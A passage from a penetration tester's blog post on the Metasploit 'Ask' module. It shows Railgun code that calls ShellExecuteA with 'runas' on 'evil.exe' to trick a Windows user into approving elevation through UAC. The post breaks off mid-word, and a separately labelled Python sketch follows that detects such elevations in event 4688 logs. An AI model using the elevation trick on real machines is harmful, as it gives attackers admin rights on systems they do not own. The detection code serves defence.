Channel: All Posts - Malicious Link - Blog by mubix - Rob Fuller

(UAC) User Assisted Compromise

A number of times during tests I’ve actually run into those mythical creatures called “patched Windows machines”. At DerbyCon Chris Gates and I released the “Ask” post module (which I had failed to publish). This module very simply uses the ShellExecute Windows function via Railgun with the undocumented (but very well known) operator of ‘runas’. These two lines accomplished that:

    # Register shell32!ShellExecuteA with Railgun (return type, then parameter list)
    client.railgun.add_function('shell32', 'ShellExecuteA', 'DWORD', [
      ["DWORD", "hwnd", "in"],
      ["PCHAR", "lpOperation", "in"],
      ["PCHAR", "lpFile", "in"],
      ["PCHAR", "lpParameters", "in"],
      ["PCHAR", "lpDirectory", "in"],
      ["DWORD", "nShowCmd", "in"],
    ])
    # The "runas" verb requests elevation, which triggers the UAC prompt
    client.railgun.shell32.ShellExecuteA(nil, "runas", "evil.exe", nil, nil, 5)

This would quite simply prompt the user with that annoying UAC prompt asking the user to run ‘evil.
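From the defender's side, a user approving such a prompt shows up as a process created with an elevated token. The following is an added detection sketch, not code from the original post or from Metasploit: it filters Security event 4688 records for consent-elevated launches (TokenElevationType %%1937) whose image sits in a user-writable directory. The sample events are constructed, and the directory list is an assumption to tune per environment.

```python
import ntpath

# TokenElevationType as logged in Security event 4688:
# %%1937 = Type 2, an elevated token issued after UAC consent.
ELEVATED_FULL = "%%1937"

# Assumption: locations a standard user can typically write to.
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")

# Constructed sample events (not real telemetry), reduced to the fields used.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "alice",
     "NewProcessName": r"C:\Windows\System32\mmc.exe",
     "TokenElevationType": "%%1937"},
    {"EventID": 4688, "SubjectUserName": "alice",
     "NewProcessName": r"C:\Users\alice\AppData\Local\Temp\evil.exe",
     "TokenElevationType": "%%1937"},
    {"EventID": 4688, "SubjectUserName": "bob",
     "NewProcessName": r"C:\Users\bob\Downloads\tool.exe",
     "TokenElevationType": "%%1938"},  # limited token, never elevated
    {"EventID": 4624, "SubjectUserName": "alice"},  # logon event, ignored
]


def is_user_writable(path):
    """Normalise the path (slashes, '..' segments) before matching markers."""
    lowered = ntpath.normpath(path).lower()
    return any(marker in lowered for marker in USER_WRITABLE_MARKERS)


def find_suspicious_elevations(events):
    """Return (user, image) for elevated launches from user-writable paths."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        if ev.get("TokenElevationType") != ELEVATED_FULL:
            continue
        image = ev.get("NewProcessName", "")
        if is_user_writable(image):
            hits.append((ev.get("SubjectUserName", "?"), image))
    return hits


if __name__ == "__main__":
    for user, image in find_suspicious_elevations(SAMPLE_EVENTS):
        print(f"elevated launch from user-writable path: {user} -> {image}")
```

Event 4688 is only written when process-creation auditing is enabled, so this check depends on that policy being on.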
